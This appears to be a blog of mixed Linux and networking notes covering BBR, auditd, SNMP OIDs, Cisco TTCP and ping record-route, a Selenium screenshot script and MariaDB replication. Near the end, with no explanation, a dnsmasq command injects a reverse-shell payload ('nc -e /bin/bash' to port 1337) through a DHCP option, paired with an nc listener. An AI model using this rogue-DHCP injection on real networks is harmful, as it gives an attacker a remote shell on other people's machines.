CUBIC TCP: the TCP congestion control algorithm used by default on most Linux systems today (RFC 8312)


Google BBR (Bottleneck Bandwidth and Round-trip propagation time)
Google deploys BBR on the GCP platform: TCP BBR congestion control comes to GCP

What is BBR?
BBR ("Bottleneck Bandwidth and Round-trip propagation time") is a new congestion control algorithm developed at Google. Congestion control algorithms — running inside every computer, phone or tablet connected to a network — decide how fast to send data.
How does a congestion control algorithm make this decision? The internet has largely used loss-based congestion control since the late 1980s, relying only on indications of lost packets as the signal to slow down. This worked well for many years, because internet switches’ and routers’ small buffers were well-matched to the low bandwidth of internet links. As a result, buffers tended to fill up and drop excess packets right at the moment when senders had really begun sending data too fast.

But loss-based congestion control is problematic in today's diverse networks:

In shallow buffers, packet loss happens before congestion. With today's high-speed, long-haul links that use commodity switches with shallow buffers, loss-based congestion control can result in abysmal throughput because it overreacts, halving the sending rate upon packet loss, even if the packet loss comes from transient traffic bursts (this kind of packet loss can be quite frequent even when the link is mostly idle).
In deep buffers, congestion happens before packet loss. At the edge of today's internet, loss-based congestion control causes the infamous “bufferbloat” problem, by repeatedly filling the deep buffers in many last-mile links and causing seconds of needless queuing delay.
We need an algorithm that responds to actual congestion, rather than packet loss. BBR tackles this with a ground-up rewrite of congestion control. We started from scratch, using a completely new paradigm: to decide how fast to send data over the network, BBR considers how fast the network is delivering data. For a given network connection, it uses recent measurements of the network's delivery rate and round-trip time to build an explicit model that includes both the maximum recent bandwidth available to that connection, and its minimum recent round-trip delay. BBR then uses this model to control both how fast it sends data and the maximum amount of data it's willing to allow in the network at any time.

BBR paper found: BBR-Congestion-Based-Congestion-Control.pdf

Audit all commands

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

Send to syslog
sed -i 's/active = no/active = yes/g' /etc/audisp/plugins.d/syslog.conf
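
The two execve rules above produce paired SYSCALL and EXECVE records per event, and arguments that contain spaces or special characters are written hex-encoded rather than quoted. The following added example (not part of the original notes; the log lines are constructed samples) joins the records by event id and decodes the arguments back into a command line.

```python
import re

# Constructed sample records in the format auditd writes for the execve rules
# above; values are illustrative, not captured from a real host.
SAMPLE_LOG = '''\
type=SYSCALL msg=audit(1700000000.101:41): arch=c000003e syscall=59 success=yes exit=0 pid=2201 uid=1000 auid=1000 comm="ls" exe="/usr/bin/ls"
type=EXECVE msg=audit(1700000000.101:41): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1700000000.202:42): arch=c000003e syscall=59 success=yes exit=0 pid=2202 uid=0 auid=1000 comm="sh" exe="/usr/bin/dash"
type=EXECVE msg=audit(1700000000.202:42): argc=3 a0="sh" a1="-c" a2=6563686F2068656C6C6F
'''

EVENT_ID = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def decode_arg(raw):
    """Quoted arguments are literal; unquoted ones are hex-encoded."""
    if raw.startswith('"'):
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode('utf-8', 'replace')
    except ValueError:
        return raw  # not hex, e.g. (null): keep as written

def commands(log_text):
    """Join SYSCALL and EXECVE records by event id; return one dict per command."""
    events = {}
    for line in log_text.splitlines():
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = dict(FIELD.findall(line))
        ev = events.setdefault(int(m.group(2)), {'ts': float(m.group(1))})
        if fields.get('type') == 'SYSCALL':
            ev.update(uid=int(fields['uid']), auid=int(fields['auid']),
                      exe=fields['exe'].strip('"'))
        elif fields.get('type') == 'EXECVE':
            argc = int(fields['argc'])
            ev['argv'] = [decode_arg(fields[f'a{i}'])
                          for i in range(argc) if f'a{i}' in fields]
    return [dict(id=k, **v) for k, v in sorted(events.items()) if 'argv' in v]

if __name__ == '__main__':
    for cmd in commands(SAMPLE_LOG):
        print(cmd['id'], cmd.get('auid'), cmd.get('uid'), cmd['argv'])
```

The auid field keeps the original login id, so the second sample event still maps a root shell back to the user who started the session.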

SNMP versions
There are v1, v2c and v3.
v1 uses a cleartext community string. The biggest downsides are that it does not support 64 bit counters, only 32 bit counters, and that it has little security.
v2c, like v1, uses a cleartext community string; it adds support for 64 bit counters. SNMPv2c is a sub-version of SNMPv2. Its key advantage over previous versions is the Inform command. Unlike Traps, which are simply received by a manager, Informs are positively acknowledged with a response message. If a manager does not reply to an Inform, the SNMP agent will resend the Inform.
v3 can be configured with authentication and with encryption of data in transit.

SNMP methods
The commonly used ones are Get, GetNext, Set and Trap.
An ro (read only) community or username/password cannot use the Set method.
An rw (read write) one can use all methods.

SNMP ports
SNMP uses UDP (IP protocol 17) port 161.
SNMP traps use UDP port 162 (when certain system components or configuration change, the SNMP daemon proactively sends a message to notify the network management platform).

SNMP OID structure [figure: OID tree; image source: Paessler AG]

SNMP v1 defines a special TRAP message format, different from other messages (such as GET). http://tools.ietf.org/html/rfc1157#page-27
This message format is not used any more in SNMP v2 and v3. If an SNMP agent sends out such TRAP messages for v2 or v3, that can be a bug. Since v2, TRAP uses the common message format (the same as GET and so on), so it is called SNMPv2-Trap-PDU. http://tools.ietf.org/search/rfc3416#page-22 SNMP v3 introduces the security model to all messages, so TRAP receives that update too. It is still based on SNMPv2-Trap-PDU.
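
The difference described above shows up in the PDU tag that follows the community string: 0xA4 for the v1 Trap-PDU and 0xA7 for SNMPv2-Trap-PDU. The following added example (not part of the original notes; the datagrams are constructed, header-only samples with an empty PDU body and the community `public`) parses community-based v1/v2c messages and flags a v1-format trap sent under the v2c version number. It also flags the reverse case, which goes beyond what the text states, and it does not handle SNMPv3.

```python
# PDU context tags from RFC 1157 (v1) and RFC 3416 (v2)
PDU = {0xA0: 'GetRequest', 0xA1: 'GetNextRequest', 0xA2: 'Response',
       0xA3: 'SetRequest', 0xA4: 'Trap-PDU (v1)', 0xA5: 'GetBulkRequest',
       0xA6: 'InformRequest', 0xA7: 'SNMPv2-Trap-PDU'}
V2_ONLY = {0xA5, 0xA6, 0xA7}

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for one BER element starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError('truncated BER header')
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                 # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], 'big')
        pos += n
    if pos + length > len(buf):
        raise ValueError('truncated BER value')
    return tag, buf[pos:pos + length], pos + length

def classify(datagram):
    """Report version, PDU type and any version/PDU mismatch of a v1/v2c message."""
    tag, msg, _ = read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError('outer SEQUENCE expected')
    tag, ver, pos = read_tlv(msg, 0)
    version = int.from_bytes(ver, 'big')      # 0 = v1, 1 = v2c on the wire
    if tag != 0x02 or version not in (0, 1):
        raise ValueError('not a community-based v1/v2c message')
    tag, _community, pos = read_tlv(msg, pos)
    if tag != 0x04:
        raise ValueError('community OCTET STRING expected')
    pdu_tag = read_tlv(msg, pos)[0]
    if version == 1 and pdu_tag == 0xA4:
        problem = 'v1 Trap-PDU inside a v2c message'
    elif version == 0 and pdu_tag in V2_ONLY:
        problem = 'v2 PDU type inside a v1 message'
    else:
        problem = None
    return {'version': 'v1' if version == 0 else 'v2c',
            'pdu': PDU.get(pdu_tag, hex(pdu_tag)), 'problem': problem}

# Constructed samples: SEQUENCE(13 bytes) { version, community "public", empty PDU }
HDR = '0406' + b'public'.hex()
SAMPLES = {
    'v1 trap': bytes.fromhex('300d' + '020100' + HDR + 'a400'),
    'v2c trap': bytes.fromhex('300d' + '020101' + HDR + 'a700'),
    'v2c agent bug': bytes.fromhex('300d' + '020101' + HDR + 'a400'),
}
```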

Some SNMP trap configuration problems on Debian-based systems
When the snmp daemon starts, the log shows:

  /etc/snmp/snmpd.conf: line 145: Warning: Unknown token: defaultMonitors.
  /etc/snmp/snmpd.conf: line 147: Warning: Unknown token: linkUpDownNotifications.
Edit /etc/default/snmpd:
comment out the "export MIBS=" line:
#export MIBS=
remove ",mteTrigger,mteTriggerConf" from the SNMPDOPTS line:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -g snmp -I -smux -p /run/snmpd.pid'
install snmp-mibs-downloader. It will download a bunch of MIBs in its postinst:
sudo apt install snmp-mibs-downloader

Commonly used OIDs on RHEL

Network Interface Statistics
List NIC names: .1.3.6.1.2.1.2.2.1.2
Get Bytes IN: .1.3.6.1.2.1.2.2.1.10
Get Bytes IN for NIC 4: .1.3.6.1.2.1.2.2.1.10.4
Get Bytes OUT: .1.3.6.1.2.1.2.2.1.16
Get Bytes OUT for NIC 4: .1.3.6.1.2.1.2.2.1.16.4

CPU Statistics
Load
1 minute Load: .1.3.6.1.4.1.2021.10.1.3.1
5 minute Load: .1.3.6.1.4.1.2021.10.1.3.2
15 minute Load: .1.3.6.1.4.1.2021.10.1.3.3

CPU times
percentage of user CPU time: .1.3.6.1.4.1.2021.11.9.0
raw user cpu time: .1.3.6.1.4.1.2021.11.50.0
percentages of system CPU time: .1.3.6.1.4.1.2021.11.10.0
raw system cpu time: .1.3.6.1.4.1.2021.11.52.0
percentages of idle CPU time: .1.3.6.1.4.1.2021.11.11.0
raw idle cpu time: .1.3.6.1.4.1.2021.11.53.0
raw nice cpu time: .1.3.6.1.4.1.2021.11.51.0

Memory Statistics
Total Swap Size: .1.3.6.1.4.1.2021.4.3.0
Available Swap Space: .1.3.6.1.4.1.2021.4.4.0
Total RAM in machine: .1.3.6.1.4.1.2021.4.5.0
Total RAM used: .1.3.6.1.4.1.2021.4.6.0
Total RAM Free: .1.3.6.1.4.1.2021.4.11.0
Total RAM Shared: .1.3.6.1.4.1.2021.4.13.0
Total RAM Buffered: .1.3.6.1.4.1.2021.4.14.0
Total Cached Memory: .1.3.6.1.4.1.2021.4.15.0

Disk Statistics
Add the following line to snmpd.conf (it applies to all partitions and disks) and restart:
includeAllDisks 10%
Disk OIDs
Path where the disk is mounted: .1.3.6.1.4.1.2021.9.1.2.1
Path of the device for the partition: .1.3.6.1.4.1.2021.9.1.3.1
Total size of the disk/partition (kBytes): .1.3.6.1.4.1.2021.9.1.6.1
Available space on the disk: .1.3.6.1.4.1.2021.9.1.7.1
Used space on the disk: .1.3.6.1.4.1.2021.9.1.8.1
Percentage of space used on disk: .1.3.6.1.4.1.2021.9.1.9.1
Percentage of inodes used on disk: .1.3.6.1.4.1.2021.9.1.10.1

System Uptime: .1.3.6.1.2.1.1.3.0

Lookup of IANA-assigned enterprise OIDs: https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers

TTCP requires Cisco IOS® Software Version 11.2 or higher and Feature
Sets IP Plus (is- images) or Service Provider (p- images). Note: The
ttcp command is a hidden, unsupported, privileged mode command. As
such, its availability may vary from one Cisco IOS software release to
another, such that it might not exist in some releases. Some
platforms, for instance, require the Cisco IOS Enterprise feature set
in order to perform this activity.

It works router-to-router or router-to-PC.

customer-dialin-sj>ttcp 
transmit or receive [receive]: transmit 
Target IP address: 10.1.1.52 
perform tcp half close [n]: 
use tcp driver [n]: 
send buflen [8192]: # buffer length
send nbuf [2048]: 50 # number of buffers
bufalign [16384]: 
bufoffset [0]: 
port [5001]: 
sinkmode [y]: 
buffering on writes [y]: 
show tcp information at end [n]:
ttcp-t: buflen=8192, nbuf=50, align=16384/0, port=5001 tcp ->10.1.1.52
ttcp-t: connect (mss 1460, sndwnd 4096, rcvwnd 4128) 

Result

ttcp-t: buflen=8192, nbuf=50, align=16384/0, port=5001 tcp -> 10.1.1.52
ttcp-t: connect (mss 1460, sndwnd 4096, rcvwnd 4128)
ttcp-t: 409600 bytes in 84544 ms (84.544 real seconds) (~3 kB/s) +++
ttcp-t: 50 I/O calls
ttcp-t: 0 sleeps (0 ms total) (0 ms average)

Since it is most common to evaluate connect speeds in kbps (kilobits
per second, or 1000 bits per second) rather than KBps (kilobytes per
second, or 1024 bytes per second), we must use the information from
TTCP to calculate the bit rate (in kbps). Use the number of bytes
received and the transfer time to calculate the actual bit rate for
the connection. Calculate the bit rate by converting the number of
bytes into bits and then dividing this by the time for the transfer. In
this example, the Windows PC received 409600 bytes in 84.94 seconds.
We can calculate the bit rate to be (409600 bytes * 8 bits per byte)
divided by 84.94 seconds = 38577 BPS or 38.577 kbps.

Reference: Using Test TCP (TTCP) to Test Throughput

# coding: utf-8
import os
import re
import sys
import time

import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options

LINK_XPATH = "//div[@id='chart']//p[@class='chart z']//a[@class='xi2']"

options = Options()
options.add_argument('-headless')       # run Firefox without a display
driver = webdriver.Firefox(options=options)
driver.set_page_load_timeout(30)        # must be set before get() to take effect
try:
    driver.get('https://feng.cmd.gd/')
    hiname = driver.find_element(By.XPATH, LINK_XPATH).text
    # The name comes from the remote page: replace path separators and other
    # unexpected characters before using it in a file path
    safe_name = re.sub(r'[^\w.-]', '_', hiname)
    userimg = '/web/wwwroot/default/' + safe_name + '.png'
    if not os.path.isfile(userimg):
        driver.find_element(By.XPATH, LINK_XPATH).click()
        time.sleep(2)
        driver.switch_to.window(driver.window_handles[1])
        driver.save_screenshot(userimg)
        # --- upload image
        smms = 'https://sm.ms/api/upload'
        with open(userimg, 'rb') as img:
            response = requests.post(smms, files={'smfile': img}, timeout=30)
        imgurl = response.json()
        print(imgurl)
        with open('/web/wwwroot/default/upload.txt', 'a') as wtxt:
            wtxt.write(str(imgurl))
finally:
    driver.quit()   # quit the Firefox driver
sys.exit(0)

ICMP Record Route: reverse-path tracing, at most 9 hops, using IP Option 7. More IP Options

r4#trace 150.1.5.5
Type escape sequence to abort.
Tracing the route to 150.1.5.5
  1 155.1.45.5 4 msec
    155.1.0.5 4 msec *
r4#
r4#ping
Protocol [ip]:
Target IP address: 150.1.5.5
Repeat count [5]: 2
Datagram size [100]:
Timeout in seconds [2]:
Extended commands [n]: y
Source address or interface:
Type of service [0]:
Set DF bit in IP header? [no]:
Validate reply data? [no]:
Data pattern [0xABCD]:
Loose, Strict, Record, Timestamp, Verbose[none]: record
Number of hops [ 9 ]:
Loose, Strict, Record, Timestamp, Verbose[RV]:
Sweep range of sizes [n]:
Type escape sequence to abort.
Sending 2, 100-byte ICMP Echos to 150.1.5.5, timeout is 2 seconds:
Packet has IP options:  Total option bytes= 39, padded length=40
 Record route: <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)

Reply to request 0 (4 ms).  Received packet has options
 Total option bytes= 40, padded length=40
 Record route:
   (155.1.45.4) <-s0/1
   (150.1.5.5)  <-destination
   (155.1.45.5) <-return path
   (155.1.45.4) <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
 End of list

Reply to request 1 (8 ms).  Received packet has options
 Total option bytes= 40, padded length=40
 Record route:
   (155.1.0.4) <-s0/0
   (150.1.5.5) <-destination
   (155.1.0.5) <-return path
   (155.1.0.4) <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
 End of list

Success rate is 100 percent (2/2), round-trip min/avg/max = 4/6/8 ms
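
The 9-hop limit and the "39 option bytes, padded length 40" in the output above follow directly from the layout of IP option 7. The following added example (not part of the original notes; function names are my own) builds the option, applies the per-hop recording step, and parses the result, replaying the four addresses from the first reply.

```python
import ipaddress

RR_TYPE = 7             # IP option 7: Record Route (RFC 791)
MAX_OPTION_BYTES = 40   # 60-byte maximum IPv4 header minus the 20-byte fixed part
MAX_SLOTS = (MAX_OPTION_BYTES - 3) // 4   # 3 bytes type/length/pointer, 4 per address

def build_rr(slots=MAX_SLOTS):
    """Empty option as the sender emits it: pointer = 4, all slots zero."""
    if not 1 <= slots <= MAX_SLOTS:
        raise ValueError('slots must be 1..%d' % MAX_SLOTS)
    return bytes([RR_TYPE, 3 + 4 * slots, 4]) + bytes(4 * slots)

def pad(option):
    """Options are padded with End-of-List (0) bytes to a 4-byte boundary."""
    return option + bytes(-len(option) % 4)

def record(option, addr):
    """What each hop does: write its address at the pointer, advance by 4."""
    length, ptr = option[1], option[2]
    if ptr + 3 > length:          # route area full: forward unchanged
        return option
    slot = ptr - 1                # pointer is 1-based from the option start
    packed = ipaddress.IPv4Address(addr).packed
    return option[:2] + bytes([ptr + 4]) + option[3:slot] + packed + option[slot + 4:]

def parse_rr(option):
    """Return (recorded addresses, free slots); reject malformed options."""
    if len(option) < 3 or option[0] != RR_TYPE:
        raise ValueError('not a Record Route option')
    length, ptr = option[1], option[2]
    if (length > len(option) or (length - 3) % 4 or ptr % 4
            or not 4 <= ptr <= length + 1):
        raise ValueError('malformed Record Route option')
    hops = [str(ipaddress.IPv4Address(option[i:i + 4]))
            for i in range(3, ptr - 1, 4)]
    return hops, (length + 1 - ptr) // 4

def replay_page_trace():
    """Replay the four addresses from the first reply in the ping output above."""
    opt = build_rr()
    for hop in ('155.1.45.4', '150.1.5.5', '155.1.45.5', '155.1.45.4'):
        opt = record(opt, hop)
    return opt

if __name__ == '__main__':
    print(len(build_rr()), len(pad(build_rr())))   # option bytes, padded length
    print(parse_rr(replay_page_trace()))
```

Because the same nine slots are shared by the request and the reply, the return path is only recorded in full when the round trip involves few enough hops.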

dnsmasq --user=root --interface=eth0 --bind-interfaces  --except-interface=lo --dhcp-range=10.10.0.10,10.10.0.20,1h --conf-file=/dev/null --dhcp-option=6,10.10.0.1 --dhcp-option=3,10.10.0.1 --dhcp-option="252,yarrak'&nc -e /bin/bash 10.10.0.3 1337 #" --log-queries --log-facility=/var/log/dnsmasq-server.log
nc -l -p 1337 -v

I plan to switch to GNU/Linux; this post came out of the detours I took while trying.
Using Debian sid.


Software used

Video playback: VLC
Screenshots: deepin-screenshot (a screenshot tool made by Deepin [deepin.org], much like the one in QQ on Windows™...)
File search: ANGRYsearch (likewise much like Everything on Windows™)


I use xfce4; for some reason its built-in automatic proxy setting did not take effect. After some Googling I found the following solution:

Reference: does xfce4 support automatic proxy configuration?

You can set up auto_proxy/AUTO_PROXY variables in /etc/environment like:

auto_proxy="https://someurl.to/your.pac"
AUTO_PROXY="https://someurl.to/your.pac"

and logout/login after that.

Version: mysql Ver 15.1 Distrib 10.1.29-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
Debian buster

Master:

Edit the MariaDB configuration file /etc/mysql/mariadb.conf.d/50-server.cnf

...
bind-address = 0.0.0.0
...
server-id = 1
log_bin = /web/data/mariadb/mysql-bin.log
...

Change the directory owner: chown mysql:mysql /web/data/mariadb/
Restart MariaDB: systemctl restart mariadb

Enter the mysql command line and add a user with replication privileges:

# mysql

MariaDB [(none)]> GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'sync'@'10.10.10.11' IDENTIFIED BY 'sync';
MariaDB [(none)]> FLUSH PRIVILEGES;
MariaDB [(none)]> EXIT

If the master is deployed on the Internet, set up a firewall (such as iptables) to block unauthorized scanning.

iptables -A INPUT -p tcp --dport 3306 -s 1.1.1.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -j DROP

Slave:

Edit the MariaDB configuration file /etc/mysql/mariadb.conf.d/50-server.cnf

...
server-id = 2
relay-log = /data/mariadb/relay.log
#log_bin = /var/log/mysql/mysql-bin.log
...

Change the directory owner: chown mysql:mysql /data/mariadb/
Restart MariaDB: systemctl restart mariadb

Enter the mysql command line and set the master's IP address, username and password.

mysql

MariaDB [(none)]> CHANGE MASTER TO MASTER_HOST='10.10.10.10', MASTER_USER='sync', MASTER_PASSWORD='sync';
MariaDB [(none)]> START SLAVE;
MariaDB [(none)]> SHOW SLAVE STATUS\G
MariaDB [(none)]> EXIT

Mind the owner of the mysql data directory.
chown mysql:mysql -R /var/lib/mysql